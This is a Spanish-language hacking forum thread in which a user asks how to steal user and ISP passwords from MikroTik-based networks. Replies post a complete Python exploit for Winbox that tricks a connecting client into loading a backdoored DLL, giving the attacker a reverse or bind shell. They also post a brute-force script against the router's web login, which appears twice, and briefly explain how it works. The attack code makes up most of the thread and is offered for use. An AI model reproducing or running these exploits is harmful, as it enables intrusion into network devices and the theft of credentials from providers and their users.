mikrotik vulerabilidad 0day

[lammer2512]

alguien sabe como usar la vulnerabilidad 0day en bactrack para obtener contreseña de usuarios y password de un proveedor que ofrece servicios de internet por medio de mikrotik

le agradeceria de que me ayudadaran para auditar redes, se que hay una manera clonando la macc y la ip de alguien conectado pero busco nuevas formas de hacerlo

[D3M0N]

En si es una vulnerabilidad muy vieja, en You are not allowed to view links. Register or Login esta toda la info con los archivos.

#!/usr/bin/python
#
#  Vulnerability Description
# ===========================
# When you connect to mikrotik router using winbox, it is asking for an index
# with plugins (DLLs) their size, version and CRCs.
# If something new is found, or if that client haven't connected to that mikrotik version yet,
# winbox requests the new plugin(s) (.dll file(s)) from mikrotik router.
# When winbox downloads all the DLLs required in order to load the controlling interface of the
# mikrotik router, loads the DLLs and then tries to make an authentication
# to the remote mikrotik router. The vulnerability exploits that winbox
# is loading the remote dlls before authentication and without any further
# confirmation of plugins originality.
#
#  The exploit
# =============
# This is a winbox vulnerability which exploits the way that winbox is working.
# That is the reason why it's working on all winbox versions (even on today's version)
# This exploit is based in leading (socialy) the victim to connect to this malicious
# winbox listener, using his/her winbox client.
#
#  Usage
# =======
# In order to use this exploit successfully you have to :
#
# 1. Have index.bin in the folder where .py script is running
# 2. Have all original DLLs of the spoofed index in the folder where .py script is running
# 3. Make a reverse/bind shell DLL, compress it with gzip and place it in script's folder and
#    enter it's filename when script will ask for it.
#         *** Your DLL's filename must have 7 chars length (ex. ppp.dll) ***
#         *** The gziped version of the dll, must be between 10k-99k (must have 5 digits of size) ***
#         The above 2 restrictions caused to the fact that i don't create the index dynamically from the script..
# 4. Social your victim to connect to the machine running the script, and gain the shell u r expecting
#
# <> Greetz flies to mbarb, dennis, andreas, AWMN and all friends and researchers out there <>
#
import socket,sys,os,struct,random
 
global fPointer
 
def SendFile(conn, filename):
        f = open(filename, 'rb')
        global fPointer
        f.seek(fPointer)
        fData = f.read(66049)
        fPointer += 66049
        f.close()
        data = conn.send(fData)
 
 
random.seed()
print "\n+-----------------------------------+"
print "|                                   |\\"
print "| Winbox remote client DLL injector | |"
print "|        = coded by PoURaN =        | |"
print "+___________________________________+ |"
print " \___________________________________\|"
 
randByte = str(random.randint(100,999))         # i need 3 random digits for a random crc
filename = raw_input("\nEnter the compressed filename: ")
fileRequest = 'ppp.dll'         # this will be the file in the index, that the client will request
                                                        # and we'll send the backdoored dll instead of the original one.
 
try:    # Open the compressed file (gzip format) in order to send it later..
        f = open(filename, 'rb')
        buff = f.read()
        f.close()
except:
        print "[-] Error opening file"
        sys.exit(0)
 
# This number is very critical for the other structures
compressedFileSize = os.path.getsize(filename)
if compressedFileSize < 10000 or compressedFileSize > 99000:
        print "[-] Error. Compressed filesize must be between 10k-99k! Read comments or visit 133tsec.com for details"
        sys.exit(0)
 
# Make the index include the size of the custom dll file... overwrite the ppp.dll size
# ( That's why we need 7 chars filelength and 5 chars filesize.. got it? :D ok am a bit lazy... ;p )
f = open('index514.dat', 'rb')
myIndex = f.read()
f.close()
myIndex = myIndex[0:0x9F] + str(compressedFileSize) + myIndex[0xA4:]    # changing filesize dynamically, in hardcoded ocffsets! **** THIS IS WRONG IF THE FILESIZE IS NOT 5 DIGITS! *****
myIndex = myIndex[0:0x9B] + randByte+" " + myIndex[0x9F:]               # changing crc to a random one so am sure every time client is downloading my backdoor again.
 
WinboxHeader =  ("\xFF\x02" +                                                   # WORD: hardcoded
                                #"\x70\x70\x70\x2E\x64\x6C\x6C" +               # VARIABLE-SIZED: filename (printable chars) MAX:11 chars
                                fileRequest +                   # **** THIS IS WRONG IF THE FILENAME LENGTH IS NOT 7 CHARS! *****
                                "\x00\x00\x00\x00" +                                    # VAR-SIZED: zero bytes till strlen(filename) + \x00*X = 11 bytes. These zeroes may not exist if strlen(filename) = 11
                                "\x01" +                                                                # BYTE: hardcoded. signals the end of zeros and beginning of the length
                                struct.pack('>h',compressedFileSize) +  # WORD: length of gzip'ed file in big endian
                                "\x00\x00\x00\x00")                                             # DWORD: hardcoded zeros before the gzip magic bytes.
 
print "\n\n[+] File \'"+filename+"\' opened with size "+str(compressedFileSize)+" bytes"
print "[+] Waiting connection on port 8291.."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
s.bind(('', 8291))
s.listen(1)
conn, addr = s.accept()
print '[+] Connection received by', addr
print "[+] Waiting for index."
data = conn.recv(1024)
if data.find("\x12\x02"+"index"+"\x00") > -1:
        print "[+] Index received!"
else:
        print "[+] Wrong index.. Exiting.."
        sys.exit(0)
print "[+] Sending DLL Index (Step 1)"
 
# Step 1 : Sending the dll index list...
data = conn.send(myIndex)
data = conn.recv(1024)
 
global fPointer
fPointer=0
 
# checking if client requests the .dll we sent.. this depends to the CRC sent in Step 1
while data.find("\x12\x02") > -1:               # If a file is requested.....
        if data.find(fileRequest) > -1:         # if the file is our backdoored compressed DLL.. ;)
                print "[+] Client just requested " + fileRequest
                print "[+] Sending compressed file with custom header (Step 2)"
                #########################################################################################
                # Step 2 : Sending the gzip file raw data with the custom header                                                #
                #########################################################################################
                #       Constructing the custom compressed file format                                                                          #
                #########################################################################################
                #       1. The header of the gzip file must be in format: WinboxHeader                                          #
                #       2. The gzip contents must contain the word 0xFF 0xFF in every 257 bytes (0x101)         #
                #       3. The gzip last 0x101-chunk must contain the word 0x(size till end of file) 0xFF       #
                #########################################################################################
                # Give the spark
                customGzip = WinboxHeader
                customGzip += buff[0:0xED]
                customGzip += '\xFF\xFF'
                #Loop the most data
                for i in range(0x1EC, len(buff), 0xFF):
                        customGzip += buff[i-0xFF:i]
                        if      0x101 > (len(buff)-i):          # if it's the last FF FF appended, then do it \x[(bytesToEOF)byte]\xFF
                                customGzip += struct.pack('=b', len(buff)-i) + '\xFF'
                        else:
                                customGzip += '\xFF\xFF'
                #..and finish it
                customGzip += buff[i:len(buff)]
                data = conn.send(customGzip)
                print "[+] Compressed file sent"
                data = conn.recv(1024)
        else:                   # else it's requesting another file from index..
                while (data[2:].split("\x00")[0]!=fileRequest) and data[0:2]=="\x12\x02":               # send other index's dll except the backdoored...
                        fPointer=0
                        print "[x] Client is requesting "+data[2:].split("\x00")[0]+" file.."
                        CurrentRequest=data[2:].split("\x00")[0]
                        while data[2:].split("\x00")[0]==CurrentRequest:
                                SendFile(conn, CurrentRequest)
                                data = conn.recv(1024)
                                print hex(struct.unpack('=B', data[18:19])[0]), hex(struct.unpack('=B', data[19:20])[0])
print "Succeeded.. Enjoy!"
conn.close()

[D3M0N]

Hay otro muy interesante de Fuerza Bruta:

MikroTik RouterOS Bruteforcer
Only use if you forgot your password!!!
Disclaimer: This script is for educational purposes only. (Or if you forgot your password and do not want to hard reset)
--
import urllib
import re
import time
 
def grep(string,list):
        expr = re.compile(string)
        for text in list:
                match = expr.search(text)
        if match != None:
                print match.string
 
brutes = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
min_chars = 1
max_chars = 10
 
base = len(brutes)
 
for b in xrange(base**(min_chars-1)-1, base**max_chars):
        num = b
        digits = []
        while True:
                digit = num % base
                digits.append(digit)
                num = num // base
                if num == 0: break
       
        digits.reverse()
        brute = "".join([brutes[d] for d in digits])
 
        url = "http://192.168.1.254/cfg?process=login&backpage=%2Fcfg&page=start&user=admin&password=" + brute + "&submit=+Log+in+"
        input = urllib.urlopen(url)
        rput = input.read()
        if rput.count("invalid") == 0:
                break
        else:
                print "'%s' was invalid." % brute
 
print "Done, the password is: '%s'!" % brute

[carrasco30]

Hay otro muy interesante de Fuerza Bruta:

MikroTik RouterOS Bruteforcer
Only use if you forgot your password!!!
Disclaimer: This script is for educational purposes only. (Or if you forgot your password and do not want to hard reset)
--
import urllib
import re
import time
 
def grep(string,list):
        expr = re.compile(string)
        for text in list:
                match = expr.search(text)
        if match != None:
                print match.string
 
brutes = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
min_chars = 1
max_chars = 10
 
base = len(brutes)
 
for b in xrange(base**(min_chars-1)-1, base**max_chars):
        num = b
        digits = []
        while True:
                digit = num % base
                digits.append(digit)
                num = num // base
                if num == 0: break
       
        digits.reverse()
        brute = "".join([brutes[d] for d in digits])
 
        url = "http://192.168.1.254/cfg?process=login&backpage=%2Fcfg&page=start&user=admin&password=" + brute + "&submit=+Log+in+"
        input = urllib.urlopen(url)
        rput = input.read()
        if rput.count("invalid") == 0:
                break
        else:
                print "'%s' was invalid." % brute
 
print "Done, the password is: '%s'!" % brute

hoola me podias decir como fuciona esta nueva,gracias por tu informacion

[D3M0N]

hoola me podias decir como fuciona esta nueva,gracias por tu informacion

En realidad es viejo, es simplemente un autocompleto de la URL y se verifica si conecta

http://192.168.88.1/cfg?process=login&backpage=%2Fcfg&page=start&user="LALA"&password="LALA"